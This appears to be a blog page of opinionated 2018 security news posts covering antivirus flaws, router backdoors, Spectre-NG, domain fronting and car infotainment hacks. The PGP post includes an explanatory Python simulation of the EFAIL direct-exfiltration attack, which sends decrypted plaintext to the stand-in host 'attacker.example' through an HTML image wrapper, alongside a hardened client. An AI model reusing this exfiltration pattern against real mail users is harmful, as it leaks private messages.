Musings tagged as security

Kaspersky, the snake oil vendor that has fallen from grace in Western mainstream politics, has temporarily halted its cooperation with Europol. This came after the plenary of the European Parliament voted for a resolution that advises EU member states to exclude and ban programs and equipment that have been confirmed as malicious. (Apparently, for most politicians, this does not fall under common sense.)

The problem is that the resolution explicitly names Kaspersky as one of those confirmed-malicious vendors, which has left them rather peeved.

The big question is: Will the EU now ban Windows 10, Alexa, Cortana, Siri, and several other malicious pieces of tech? ^^

F-Secure Not So Secure

Wed, Jun 6, 2018

Another snake oil vulnerability was unveiled recently: F-Secure's products allow arbitrary code execution by means of a specially crafted RAR archive. Since the scanner inspects files automatically, without asking, an affected user can do very little about it once such an archive ends up in the claws of their F-Secure installation.

Remember the urgent public safety issue from not too long ago? Turns out the FBI has repeatedly overstated, to Congress and the public, the figures behind the so-called encryption threat. Among other things, the FBI claimed it was locked out of nearly 7,800 devices connected to crimes when the actual number is somewhere between 1,000 and 2,000. Apparently a "programming error" is to blame, which led to the devices being miscounted. Yeah ... right ...

Another Day Another Backdoor

Wed, May 23, 2018

Kaspersky Lab researchers have discovered a backdoor in the firmware of D-Link DIR-620 routers: a built-in administrative account that the owners of these routers have no way to disable. The researchers also found three further vulnerabilities in the firmware: recovery of the Telnet credentials, URL injection leading to the execution of OS commands, and an XSS in the "Quick Search" admin panel.

PGP Vulnerabilities Discovered

Mon, May 14, 2018

Security researchers have discovered vulnerabilities in mail clients' implementations of PGP and S/MIME. Apparently the GnuPG team was not contacted beforehand, and they dismiss the researchers' recommendation to immediately stop using anything PGP- or S/MIME-related as overblown.

While the researchers refused to immediately disclose the exact nature of the vulnerabilities, the GnuPG team has released a statement. The gist is not broken crypto but broken MIME and HTML handling in mail clients: an attacker wraps or modifies the encrypted message so that, once the client has decrypted it and renders the result as HTML, the plaintext leaks through a remote resource load such as an image URL. This also means you are only vulnerable if your mail client renders HTML and loads remote content, in which case you are evil anyway. ;)
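To make that mechanism concrete, here is a simulation of the direct-exfiltration variant (an added example; not code from the researchers, from GnuPG or from this blog): the attacker re-sends a captured encrypted MIME part sandwiched between two HTML fragments, and a client that decrypts the part and then renders all parts as one HTML document turns the plaintext into the query string of an image request to the attacker's server. No real OpenPGP is involved: the ciphertext block, the plaintext, the addresses and the attacker host `attacker.example` are constructed stand-ins, and `simulate_decrypt` stands in for gpg, including the MDC (modification detection) result that the GnuPG statement says clients must honour.

```python
"""Simulation of the direct-exfiltration attack on PGP/S-MIME mail clients.
Added example; no real OpenPGP is involved (decryption is a lookup on a
constructed stand-in block)."""
import html
import re
from email import message_from_string
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Constructed sample data: the plaintext the victim once sent, and the armored
# block an attacker captured in transit. Neither is real ciphertext.
SECRET_PLAINTEXT = "Meeting moved to 16:00, door code 4711"
CAPTURED_PGP_BLOCK = (
    "-----BEGIN PGP MESSAGE-----\n"
    "hQEMA-constructed-stand-in-not-real-ciphertext-AQf/\n"
    "-----END PGP MESSAGE-----"
)
# Hypothetical attacker-controlled collection server.
ATTACKER_URL_PREFIX = "http://attacker.example/leak?"
IMG_SRC = re.compile(r'<img\s+src="([^"]*)"')


def simulate_decrypt(armored):
    """Stand-in for `gpg --decrypt`: returns (plaintext, mdc_ok).

    gpg checks the MDC and reports a failure for ciphertext that has been
    tampered with; the client must then refuse to display the output."""
    if armored.strip() == CAPTURED_PGP_BLOCK:
        return SECRET_PLAINTEXT, True
    return "", False


def build_attacker_mail(captured_block):
    """The attacker re-sends the captured block between two HTML fragments:
    an opened <img src="..."> before it and the closing quote/bracket after it."""
    outer = MIMEMultipart("mixed")
    outer["From"] = "attacker@attacker.example"
    outer["To"] = "victim@example.org"
    outer["Subject"] = "Re: meeting"
    outer.attach(MIMEText('<img src="' + ATTACKER_URL_PREFIX, "html"))
    outer.attach(MIMEText(captured_block, "plain"))  # ciphertext, untouched
    outer.attach(MIMEText('">', "html"))
    return outer.as_string()


def decrypted_parts(raw_mail):
    """Yield (content_type, body, mdc_ok) for every leaf MIME part, decrypting
    inline PGP blocks the way a PGP-aware client would."""
    msg = message_from_string(raw_mail)
    for part in msg.walk():
        if part.is_multipart():
            continue
        charset = part.get_content_charset() or "utf-8"
        body = part.get_payload(decode=True).decode(charset)
        mdc_ok = True
        if "-----BEGIN PGP MESSAGE-----" in body:
            body, mdc_ok = simulate_decrypt(body)
        yield part.get_content_type(), body, mdc_ok


def vulnerable_client_fetches(raw_mail):
    """A client that splices all parts into one HTML document, ignores MDC
    failures and loads every remote image. Returns the URLs it would request:
    the decrypted plaintext ends up as the query string of the attacker's URL."""
    document = "".join(body for _, body, _ in decrypted_parts(raw_mail))
    # Browsers strip surrounding whitespace from attribute URLs.
    return [url.strip() for url in IMG_SRC.findall(document)]


def hardened_client_view(raw_mail):
    """A client that keeps every part separate, shows HTML as escaped text
    instead of rendering it, refuses to show output whose MDC check failed,
    and therefore never loads remote content. Returns what the user sees."""
    shown = []
    for _, body, mdc_ok in decrypted_parts(raw_mail):
        if not mdc_ok:
            shown.append("[decryption failed: message was modified, output suppressed]")
            continue
        shown.append(html.escape(body))  # text, never parsed as HTML
    return "\n".join(shown)


if __name__ == "__main__":
    mail = build_attacker_mail(CAPTURED_PGP_BLOCK)
    print("vulnerable client requests:", vulnerable_client_fetches(mail))
    print("hardened client shows:\n" + hardened_client_view(mail))
```

The hardened client shows why the GnuPG team's advice works: if HTML is not rendered and remote content is not loaded, the attacker's `<img>` wrapper is just text on screen, and a tampered message is refused instead of displayed.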

A new cryptojacking campaign is going around that exploits a vulnerability in the Drupal content management system. Security researcher Troy Mursch has a nice writeup on the issue and also maintains a list of affected sites.

Basically, the vulnerability is exploited to inject cryptomining JavaScript into the compromised site's pages; that script then burns the CPU of every visitor to mine cryptocurrency for the attackers.

Among the affected sites are names such as Lenovo, UCLA, the Turkish Revenue Administration's Aydin Tax Office (oh, sweet irony), and D-Link Brazil. An important reminder of what happens if you do not update your shit!

The German computer magazine c't has published an article (English version available) in which it claims to have exclusive information regarding eight new security holes in Intel processors.

Dubbed "Spectre Next Generation", or Spectre-NG for short, these flaws are apparently more severe and more easily exploited than the previously known Spectre variants. For now c't refrains from publishing technical details to give Intel a head start on patches, but one of the disclosure deadlines apparently runs out on May 7th.

According to c't, at least one of the Spectre-NG flaws allows code running in a virtual machine to attack the host system or other VMs on the same host, which makes these bugs particularly dangerous for cloud and shared hosting providers.

It will be interesting to see how things unfold. Together with AMD's recently released updated Ryzen CPU line, which seems to perform quite well so far, this might be even more reason to consider a switch to AMD, provided they are not affected by Spectre-NG.

After Tor users found out that Google had quietly disabled domain fronting on its servers, Amazon apparently wants to make more of a fuss: it sent a letter to the Signal Foundation threatening to take them off its servers if they do not stop using domain fronting. The linked blog post by Signal founder Moxie Marlinspike explains what domain fronting is (hiding the true destination of a connection behind a large provider's domain, so a censor cannot block it without blocking the whole provider) and how it helps circumvent censorship in countries like Iran, Iraq, the UAE and the like.

Good reason to cancel your Amazon Prime account and use alternative online shops instead, if you ask me. Helping questionable regimes with their censorship efforts by threatening the only properly secure messaging service out there is pretty fucked up.

It is happening. The stupidity of car manufacturers turning cars into IoT devices is showing more and more. Security professionals have long criticised companies for creating remote pathways into their vehicles' electronics and drive systems, and it looks like, of course, they were right. A Dutch cyber security firm (Computest) has apparently hacked a VW Golf GTE and an Audi A3 Sportback via Wi-Fi and also via USB.

They gained access to the root account of the In-Vehicle Infotainment (IVI) system and, to quote:

Under certain conditions attackers could listen in to conversations the driver is conducting via a car kit, turn the microphone on and off, as well as gain access to the complete address book and the conversation history.

Oh, nice! But wait, there is more:

Furthermore, due to the vulnerability, there is the possibility of discovering through the navigation system precisely where the driver has been, and of following the car live wherever it is at any given time.

It gets better and better, but at least they did not get as far as controlling the car's driving functions...

Keuper and Alkemade say the IVI system is also indirectly connected to the car's acceleration and braking system, but they stopped investigating the possibility of interacting with those systems, fearing they might breach Volkswagen's intellectual property.